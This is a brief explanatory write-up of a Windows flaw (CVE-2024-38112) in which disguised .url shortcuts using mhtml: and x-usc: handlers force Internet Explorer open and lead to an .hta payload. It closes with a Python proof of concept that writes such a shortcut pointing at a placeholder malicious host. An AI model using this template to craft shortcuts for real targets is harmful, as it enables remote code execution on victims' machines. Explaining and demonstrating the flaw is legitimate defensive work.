Overview
Recent security research uncovered a new vulnerability within Windows systems that exploits Internet Explorer to execute remote code. This discovery involves .url files, which attackers can use to trick victims into opening malicious websites with the outdated Internet Explorer, instead of more secure modern browsers like Chrome or Edge.
Background
.url files in Windows are used to create shortcuts to webpages. In this case, attackers manipulate these files using the mhtml protocol combined with deceptive file type descriptions (e.g., a disguised PDF) to entice user interaction.
Explanation
This vulnerability exploits the way Internet Explorer handles the mhtml protocol and misinterprets file types:
- Attackers create a
.urlfile with the mhtml protocol that points to a controlled malicious website. - The file icon and name are designed to appear as a harmless PDF file, increasing the likelihood that a user will open it.
- When the user attempts to open the file, Internet Explorer is actually invoked to open an HTML page containing malicious scripts.
- This page further prompts the download and execution of an
.htafile, containing executable scripts that complete the attack.
Exploit Code:
import os
def create_malicious_url_file():
content = """
[InternetShortcut]
URL=mhtml:http://example.com/malicious_page.html!x-usc:http://example.com/malicious_page.html
IconFile=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
IconIndex=1
"""
filename = "CVE-2024-38112_Demo.url"
with open(filename, "w") as file:
file.write(content)
print(f"Malicious .url file created: {filename}")
def simulate_user_action():
try:
os.startfile("CVE-2024-38112_Demo.url")
print("Attempted to open the malicious .url file.")
except Exception as e:
print(f"Error: {str(e)}")
def main():
create_malicious_url_file()
if __name__ == "__main__":
main()
